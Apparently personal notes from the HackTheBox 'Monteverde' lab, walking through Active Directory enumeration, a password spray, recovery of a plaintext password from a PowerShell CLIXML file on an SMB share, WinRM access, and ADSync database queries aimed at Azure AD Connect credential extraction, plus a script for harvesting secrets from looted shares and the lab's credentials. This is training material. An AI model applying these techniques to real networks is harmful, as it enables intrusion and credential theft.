HackTheBox · Lab
Medium · Windows · Active Directory · Password Attacks

Monteverde.pdf

notes

NMAP

```shell
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown
```

SMB

Anonymous (null session) auth succeeds but lists nothing


Guest account is disabled

LDAP

Anonymous bind succeeds


Anonymous user enumeration:


```shell
AAD_987d7f2f57d2   # AD Connect (Azure AD Connect sync) account?
mhope
SABatchJobs        # batch jobs service account?
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```


Windapsearch


Let's see who's in `Remote Management Users` (the group that grants WinRM access):


```shell
CN=Mike Hope,OU=London,OU=MegaBank Users,DC=MEGABANK,DC=LOCAL
```

Enum4linux

No account lockout policy, so a password spray won't lock anyone out

Password Spray

One hit


```shell
SABatchJobs:SABatchJobs
```

SMB auth with these creds succeeds; share listing:

```shell
Share          Permissions   Remark
-----          -----------   ------
ADMIN$                       Remote Admin
azure_uploads  READ
C$                           Default share
E$                           Default share
IPC$           READ          Remote IPC
NETLOGON       READ          Logon server share
SYSVOL         READ          Logon server share
users$         READ
```


Found File


```shell
//10.10.10.172/users$/mhope/azure.xml
```


```shell
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
```


Password found!


```shell
4n0therD4y@n0th3r$
```


As it was found in mhope's folder, let's assume it's his.
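`azure.xml` is CLIXML, the serialization format `Export-Clixml` writes, and PowerShell deserializes it natively with `Import-Clixml`. The following is an added example, not code from these notes, that walks a local copy of the `users$` share and reports plaintext secrets found in any CLIXML file; the loot path `C:\loot\users` and the function name are assumptions. The distinction it makes is the one that matters here: the password in `azure.xml` is a plain `<S>` string, so it reads back anywhere, whereas an `<SS>` SecureString is DPAPI-wrapped and only decrypts as the original user on the original host.

```powershell
# Added example, not from the notes: find Export-Clixml output and pull plaintext
# secrets out of it. Assumes the users$ share was copied to C:\loot\users (hypothetical).
function Find-ClixmlSecrets {
    param([string]$Root)
    $clixmlNs = 'http://schemas.microsoft.com/powershell/2004/04'

    Get-ChildItem -LiteralPath $Root -Recurse -Filter *.xml -File -ErrorAction SilentlyContinue |
    ForEach-Object {
        $raw = Get-Content -LiteralPath $_.FullName -Raw
        if ($raw -notmatch [regex]::Escape($clixmlNs)) { return }   # not CLIXML, skip

        # <SS N="..."> is a DPAPI-protected SecureString: Import-Clixml can only
        # unwrap it as the exporting user on the exporting host, so just flag it.
        if ($raw -match '<SS N="([^"]+)"') {
            Write-Warning "$($_.FullName): SecureString field '$($Matches[1])' (DPAPI-bound)"
        }

        try { $objs = Import-Clixml -LiteralPath $_.FullName } catch { return }
        foreach ($o in @($objs)) {
            foreach ($p in $o.PSObject.Properties) {
                # Plain <S> strings deserialize straight to [string]; azure.xml's
                # Password property is one of these, which is why it is readable.
                if ($p.Name -match 'pass|secret|token' -and $p.Value -is [string] -and $p.Value) {
                    [pscustomobject]@{
                        File     = $_.FullName
                        Type     = $o.PSObject.TypeNames[0]
                        Property = $p.Name
                        Value    = $p.Value
                    }
                }
            }
        }
    }
}

Find-ClixmlSecrets -Root 'C:\loot\users' | Format-Table -AutoSize
```

Run against the `azure.xml` above it reports one row: a `Deserialized.Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential` with a `Password` property holding the value in the notes.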


Success


```shell
[+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
(Pwn3d!)
```

EVIL-WINRM as mhope

`mhope` is a member of `Azure Admins`


Also some interesting apps


According to Microsoft, the service responsible for syncing on-prem AD to Azure AD is `ADSync` (the Azure AD Connect sync service).


Get-Process and tasklist both return access denied.


Invoking them through PowerShell is denied as well.


```shell
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         1/2/2020   9:36 PM                Common Files
d-----         1/2/2020   2:46 PM                internet explorer
d-----         1/2/2020   2:38 PM                Microsoft Analysis Services
d-----         1/2/2020   2:51 PM                Microsoft Azure Active Directory Connect
d-----         1/2/2020   3:37 PM                Microsoft Azure Active Directory Connect Upgrader
d-----         1/2/2020   3:02 PM                Microsoft Azure AD Connect Health Sync Agent
d-----         1/2/2020   2:53 PM                Microsoft Azure AD Sync
d-----         1/2/2020   2:38 PM                Microsoft SQL Server
```


The registry is readable, though:


```shell
Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync
```


And we can see an executable


```shell
ImagePath        : "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe"
```


The binary's file and product version can be read from its `VersionInfo` (useful for matching the build against a known issue):


```shell
Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-List -Property * -Force
```


Let's have a look at the internal listening ports (netstat):


```shell
Active Connections
  Proto  Local Address          Foreign Address        State           PID      Offload State
  TCP    10.10.10.172:1433
```


MSSQL apparently


Let's pull `keyset_id`, `instance_id` and `entropy` (the key-set identifiers ADSync needs to unlock its credential store) out of the database manually:


```shell
C:\Program Files> sqlcmd -S MONTEVERDE -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration"
Changed database context to 'ADSync'.
instance_id                          keyset_id   entropy
------------------------------------ ----------- ------------------------------------
1852B527-DD4F-4ECF-B541-EFCCBFF29E31           1 194EC2FC-F186-46CF-B44D-071EB61F49CD

(1 rows affected)
```


We can use the technique from [https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/) to extract the stored sync-account creds.



Ippsec Notes

rpcclient

SMBmap

```shell
smbmap -u $USER -p $PASS -H $IP -R --exclude $SHARE,$SHARE
smbmap -u $USER -p $PASS -H $IP --download $SHARE/folder/file.txt
```

In windows shell

```shell
hostname; whoami; ipconfig
```

Seatbelt.exe ?

PowerUpSQL.ps1

xp_dirtree was callable on the box: you can grab a NetNTLM hash with Responder, but it's a rabbit hole here.

Scope

OS

Windows 10 / Server 2019 Build 17763 x64

FQDN / DOMAIN

MONTEVERDE.MEGABANK.LOCAL

Domain SID S-1-5-21-391775091-850290835-3566037492

Users

Administrator
Guest
krbtgt
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

Credentials

SABatchJobs:SABatchJobs
mhope:4n0therD4y@n0th3r$
administrator:d0m@in4dminyeah!

NMAP

PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49693/tcp open  unknown

SMB Shares

Share          Permissions   Remark
-----          -----------   ------
ADMIN$                       Remote Admin
azure_uploads  READ
C$                           Default share
E$                           Default share
IPC$           READ          Remote IPC
NETLOGON       READ          Logon server share
SYSVOL         READ          Logon server share
users$         READ

Web Services Enumeration

Web Technology

[+] Nikto

[+] Wfuzz


Other Notes


Privilege Escalation


Takeaway Concepts

https://blog.xpnsec.com/azuread-connect-for-redteam/


Logs
